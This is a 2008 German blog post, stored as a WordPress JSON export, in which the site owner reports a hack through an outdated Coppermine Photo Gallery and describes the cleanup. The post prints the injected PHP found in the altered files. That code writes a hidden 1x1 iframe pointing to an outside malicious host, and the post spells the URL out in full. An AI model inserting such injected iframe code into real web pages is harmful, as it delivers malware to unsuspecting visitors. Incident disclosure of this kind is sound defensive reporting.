{"id":456,"date":"2008-04-17T10:33:37","date_gmt":"2008-04-17T08:33:37","guid":{"rendered":"http:\/\/www.navision-blog.de\/2008\/04\/17\/navision-blogde-wurde-ziel-eines-hackerangriffs\/"},"modified":"2008-04-18T10:16:52","modified_gmt":"2008-04-18T08:16:52","slug":"navision-blogde-wurde-ziel-eines-hackerangriffs","status":"publish","type":"post","link":"http:\/\/www.navision-blog.de\/blog\/2008\/04\/17\/navision-blogde-wurde-ziel-eines-hackerangriffs\/","title":{"rendered":"Navision-Blog.de wurde Ziel eines Hackerangriffs"},"content":{"rendered":"<p>Seit gestern Nachmittag war der Navision-Blog eine zeitlang tot, da er Opfer eines Hackerangriffs war. Offenbar wurde eine Schwachstelle (Exploit <a href=\"http:\/\/www.milw0rm.com\/exploits\/1511\">&#8220;Coppermine Photo Gallery &lt;= 1.4.3 remote commands execution&#8221;<\/a>) in der <a href=\"http:\/\/coppermine-gallery.net\/\">Coppermine Gallery<\/a> ausgenutzt. Im Ergebnis wurden min. 352 Dateien manipuliert. Diese sorgten daf&#252;r das beim Anschauen der Seite mit dem Internet Explorer &#252;ber einen iFrame ein ActiveX-Plugin nachgeladen werden sollte. Ich kenne die Auswirkungen des &#8220;Plugins&#8221; nicht, aber ich hoffe das hat keiner installiert.<\/p>\n<p>Die betroffenen Dateien sahen alle ungef&#228;hr so aus:<\/p>\n<blockquote>\n<p>&lt;?php<br \/>if($GLOBALS[&#8220;fx&#8221;]==0) {<br \/>$GLOBALS[&#8220;fx&#8221;]=1;<br \/>echo &#8220;&lt;iframe src=&#8217;http:\/\/ccf<br \/>elomvhk.co<br \/>m\/dl\/adv542<br \/>.php&#8217; width=1 height=1&gt;&lt;\/iframe&gt;&#8221;;<br \/>}<br \/>?&gt;&lt;?php<br \/>if($GLOBALS[&#8220;fx&#8221;]==0) {<br \/>$GLOBALS[&#8220;fx&#8221;]=1;<br \/>echo &#8220;&lt;iframe src=&#8217;http:\/\/ccf<br \/>elomvhk.co<br \/>m\/dl\/adv542<br \/>.php&#8217; width=1 height=1&gt;&lt;\/iframe&gt;&#8221;;<br \/>}<br \/>?&gt;<\/p>\n<\/blockquote>\n<p>Die kryptische Url bedeutet: <strong>http:\/\/ccfelomvhk.com\/dl\/adv542.php<\/strong><\/p>\n<p>Ich habe jetzt erst einmal eine Sicherung eingespielt und versuche die Coppermine Gallery zu updaten. Ich bin ja selber schuld: Ich habe versucht mein WordPress immer aktuell zu halten, aber an die Gallery habe ich nicht gedacht. Die hat noch eine uralte Versionsnummer.<\/p>\n<p>Weitere Informationen:<\/p>\n<ul>\n<li><a href=\"http:\/\/forum.coppermine-gallery.net\/index.php\/topic,51671.0.html\">Forumseintrag<\/a> <\/li>\n<\/ul>\n<p>Nachtrag: Als Konsequenz aus dem Angriff habe ich mich entschieden die Coppermine Galerie abzuschalten und zuk&#252;nftig nur noch &#252;ber meinen <a href=\"http:\/\/www.flickr.com\/photos\/25191666@N02\/\">Flickr-Account<\/a> zu arbeiten.<\/p>\n","protected":false},"excerpt":{"rendered":"<p>Seit gestern Nachmittag war der Navision-Blog eine zeitlang tot, da er Opfer eines Hackerangriffs war. Offenbar wurde eine Schwachstelle (Exploit &#8220;Coppermine Photo Gallery &lt;= 1.4.3 remote commands execution&#8221;) in der Coppermine Gallery ausgenutzt. Im Ergebnis wurden min. 352 Dateien manipuliert. Diese sorgten daf&#252;r das beim Anschauen der Seite mit dem Internet Explorer &#252;ber einen iFrame [&hellip;]<\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":[],"categories":[18],"tags":[385,387,384,386,92],"_links":{"self":[{"href":"http:\/\/www.navision-blog.de\/blog\/wp-json\/wp\/v2\/posts\/456"}],"collection":[{"href":"http:\/\/www.navision-blog.de\/blog\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"http:\/\/www.navision-blog.de\/blog\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"http:\/\/www.navision-blog.de\/blog\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"http:\/\/www.navision-blog.de\/blog\/wp-json\/wp\/v2\/comments?post=456"}],"version-history":[{"count":0,"href":"http:\/\/www.navision-blog.de\/blog\/wp-json\/wp\/v2\/posts\/456\/revisions"}],"wp:attachment":[{"href":"http:\/\/www.navision-blog.de\/blog\/wp-json\/wp\/v2\/media?parent=456"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"http:\/\/www.navision-blog.de\/blog\/wp-json\/wp\/v2\/categories?post=456"},{"taxonomy":"post_tag","embeddable":true,"href":"http:\/\/www.navision-blog.de\/blog\/wp-json\/wp\/v2\/tags?post=456"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}